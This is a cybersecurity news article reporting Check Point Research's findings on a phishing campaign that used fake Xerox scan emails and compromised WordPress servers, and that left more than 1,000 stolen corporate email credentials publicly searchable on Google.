Fraud Management & Cybercrime , Social Engineering

Hackers Leave Stolen Email Credentials Exposed

Stolen Credentials Stored on Accessible Database
Hackers Leave Stolen Email Credentials Exposed
One of the phishing pages used by the attackers (Source: Check Point Research)

Hackers waging a phishing campaign stole more than 1,000 corporate email credentials and then stored the stolen data in a database accessible via a simple Google search, Check Point Research says.

See Also: User Entity & Behavior Analytics 101: Strategies to Detect Unusual Security Behaviors

The phishing campaign, which began in August 2020, sent emails set up to look like in-office Xerox scan notifications. The threat actors mainly targeted employees at energy and construction companies, but they also hit the retail, finance and education sectors, Check Point says.

The phishing messages contained a malicious HTML attachment that, if opened, launched the credential stealing effort that included running a JavaScript code. This ran in the background of the document and was responsible for simple password checks, sending the data to the attackers’ drop-zone server and redirecting the user to a legitimate Office 365 login page.

The threat actors made the misstep of storing the valuable stolen data in a publicly accessible database, making the credentials accessible to anyone by searching Google, the report adds.

"The Google search engine algorithm naturally indexes the internet," Check Point Research notes. "It was also capable of indexing the hackers’ pages where they temporarily stored the stolen credentials."

The security firm informed Google of the situation, and while the data remains online, victims can use Google search to look for their stolen credentials and then change them, Check Point says.

Attack Techniques

The attackers used compromised email addresses to send the phishing emails in an attempt to make them seem legitimate, the researchers say. The malicious payloads were hosted on compromised WordPress servers to help avoid email security.

"We discovered dozens of compromised WordPress servers that hosted the malicious PHP page (named 'go.php', 'post.php', 'gate.php', 'rent.php' or 'rest.php') and processed all incoming credentials from victims of the phishing attacks," Check Point says.

Pointing to the posting of the stolen data on a publicly accessible database, Saryu Nayyar, CEO of security firm Gurucul, notes: “Attackers are susceptible to the same sort of simple configuration errors that many of them leverage against their targets. But this case also shows that attackers can operate phishing schemes successfully for many months before they're exposed.”

Other Attacks

In recent months, at least two other efforts to steal email credentials were revealed.

In December, Abnormal Security uncovered a spear-phishing campaign that used messages that appear to originate from legitimate companies to target enterprise users in an effort to steal Microsoft Office 365 credentials (see: Recent Spear-Phishing Attacks Originate From Legit Accounts).

And in November, Microsoft's Security Intelligence team warned Office 365 users about another phishing campaign that appeared to be harvesting victims' credentials (see: Microsoft Warns of Office 365 Phishing Attacks).

About the Author

Akshaya Asokan

Akshaya Asokan

Senior Correspondent, ISMG

Asokan is a U.K.-based senior correspondent for Information Security Media Group's global news desk. She previously worked with IDG and other publications, reporting on developments in technology, minority rights and education.

Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing, you agree to our use of cookies.